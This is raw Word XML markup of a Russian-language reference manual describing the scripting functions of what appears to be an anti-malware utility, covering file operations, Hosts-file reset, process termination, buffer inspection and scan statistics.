      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>файла</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hosts. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В файле Hosts остаются все коммент</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>рии из исходного файла, все значацие строки удаляются и добавляется еди</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ственная значащая строка строка "127.0.0.1 localhost". Функция возвращает true в случае успешного запуска и False в случае ошибки</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GetCurrentDirectory : </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Функция возвращает текущий каталог. Имя каталога нормализовано и с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>держит '\' на конце.</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NormalDir(ADirName : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</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Производит</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нормализацию</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>имени</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>папки</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">.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ExtractFileName(AName : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">)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Извлекает имя файла из полного имени. Например, если передать фун</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>к</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ции полное имя файла "c:\virus\file.exe", то функция вернет "file.exe".</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DirectoryExists(ADirName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true, если на диске существует указанный каталог. Переда</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ное имя каталога автоматически нормализуется, поэтому наличие/отсутствие слеша в конце пути, наличие пробелов в начале и конце имени каталога не вл</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>яет на работу функции.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GetFileVersion(AFileName : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">; AInfoType : integer)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версию или копирайты указанного исполняемого файла (если они у него есть).</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GetFileSize(AFileName : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)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размер файла с указанным именем в байтах. В случае ошибки (файл не найден, ошибка доступа) возвращается размер "–1".</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FileExists(AFileName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Функция возвращает TRUE, если на диске найден указанный файл.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SetAttr(AName : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; Attr : integer):boolean;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Данная функция устанавливает файлу или папке с именем AName атр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">буты Attr. Кодирование атрибутов описано в разделе </w:t>
      </w:r>
      <w:hyperlink r:id="rId145" w:history="1">
        <w:r w:rsidRPr="006E1E7E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>Кодирование атрибутов файла</w:t>
        </w:r>
      </w:hyperlink>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CalkFileMD5(AFileName : </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">) : </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>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MD5 сумму указанного файла или пустую строку в случае, если файл не существует или доступ к нему заблокирован.</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lastRenderedPageBreak/>
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> DeleteFile(AFileName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указанный файл. Возвращает TRUE в случае успешного удал</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ния и FALSE в случае ошибки.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CopyFile(AFromName, AToName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копирование файла с именем AFromName в файл AToName. Возвращает true, если копирование было успешным и false в случае ошибки.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SearchFiles(APath, AMask : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; AFileList : TStrings; AFullPath, AAppendFiles : boolean)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Осуществляет поиск файлов по маске AMask в каталоге APath. Найде</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ные файлы помещаются в список AFileList.</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FolderIsEmpty(AName : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>):boolean;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TRUE, если указанная папка отсутствует на диске, или пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сутствует и пустая (не содержит вложенных папкок и файлов). Если папка с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ществует и в ней есть хотя–бы один вложенный объект, то возвращает FALSE. Донная функция оцень полезна для операций чистки каталогов, содержащих кеши, дампы, протоколы и т.п.</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FSResetSecurity(AName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все привилегии файлового объекта с именем AName, делая его доступным для всех пользователей. Данная функция полезна для удаления фа</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>й</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>лов и папок, созданных вредоносными программами.</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ExecuteFile(FileName, Params : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Mode : integer; WaitTime : integer; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Terminate : boolean)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Производит выполнение указанного файла.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RefreshProcessList:boolean;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Обновляет список процессов. Эта функция должна вызываться перед началом работы со списком процессов. Функция возвращает True, если постр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ение списка было успешным.</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GetProcessCount:integer;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количество процессов в списке, построенном при помощи RefreshProcessList. Вызов GetProcessCount до успешного вызова RefreshProcessList не является ошибкой – в этом случае возвращается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GetProcessName(Indx : integer):</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string;</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имя исполняемого файла процесса с индексом Indx.</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GetProcessPID(Indx : integer):dword;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PID процесса с индексом Indx</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TerminateProcess(PID : dword):boolean;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lastRenderedPageBreak/>
        <w:t>Завершает процесс с указанным PID.</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TerminateProcessByName(AName : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>):boolean;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Останавливает все процессы, имя которых </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>содержит</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> указанный в AName образец.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LoadFileToBuffer(AFile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загрузку файла с указанным именем в буфер для последу</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ю</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>щего изучения.</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LoadFileToBuffer(AFile : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; ARel : integer; ALen : integer)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загрузку файла с указанным именем в буфер для последу</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ю</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">щего изучения.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FreeBuffer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освобождение памяти, выделенной в ходе успешного вызова LoadFileToBuffer. Повторный вызов не является ошибкой – при отсутствии б</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">фера в памяти функция считает, что очистка прошла успешно.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GetBufferSize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размер буфера в байтах. Может применяться в случае орган</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>зации нестандартных алгоритмов анализа буфера в цикле. В случае отсутствия буфера в памяти (т.е. еще не производилась загрузка данных или был вызов FreeBuffer) возвращается значение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GetBufferByte(ARel : integer) : byte;</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байт по указанному смещению. Задание недопустимого см</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>щения не приведет к ошибке, но функция вернет значение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GetBufferWord(ARel : integer) : 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word (двух–байтное целое) по указанному смещению. Зад</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ние недопустимого смещения не приведет к ошибке, но функция вернет знач</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ние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GetBufferDWord(ARel : integer) : dword;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dword (четырех–байтное целое) по указанному смещению. Задание недопустимого смещения не приведет к ошибке, но функция вернет значение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GetBufferStr(ARel : integer; ALen : integer)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строку символов начиная от заданного смещения ARel. О</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>рицательные смещения рассматриваются как смещения относительно конца буфера.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GetSuspCount:integer;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количество подозрительных файлов, обнаруженных в ходе последнего сканирования.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GetDetectedCount:integer;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количество детектированных вредоносных файлов, обнар</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>женных в ходе последнего сканирования.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GetParamCount:integer;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lastRenderedPageBreak/>
        <w:t>Возвращает количество параметров, переданных пользователем в к</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">мандной строке.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GetParamStr(AParamId:integer)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параметр с указанным номером или пустую строку, если н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>мер параметра вне диапазона.</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GetParamByName(AParamName:</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">)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значение параметра, найденного по имени. Для использов</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ния данной функции необходимо передавать параметры в формате имя=значение. Если параметр не найден, то возвращается пустая строка. Если яреди параметров встречается несколько параметров с одинаковым именем, то функция возвращает значение первого из них.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StringReplace(S, OldPattern, NewPattern: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">)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строку S, в которой все вхождения OldPattern заменены на NewPattern. Сравнение при поиске OldPattern ведется без учета регистра симв</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>лов.</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Pos(SubStr, S: </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>):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позицию подстроки substr в строке S. Поиск подстроки в</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>дется с учетом регистра символов. Если поиск подстроки успешен, то возвр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>щается номер первого символа первого вхождения SubStr в строке S. Если п</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>иск неуспешен, то функция возвращает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Insert(S: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> S2: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; pos: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Вставляет строку S в позицию pos строки S2.</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Delete(</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> s: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; from, count: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из строки S несколько символов начиная с позиции from, колич</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ство удаляемых символов задается параметром count.</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Copy(s: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">; from, count: Integer):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фрагмент строки S длиной count символов начиная с позиции from. Указание некорректных значений from и count приводит к тому, что во</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
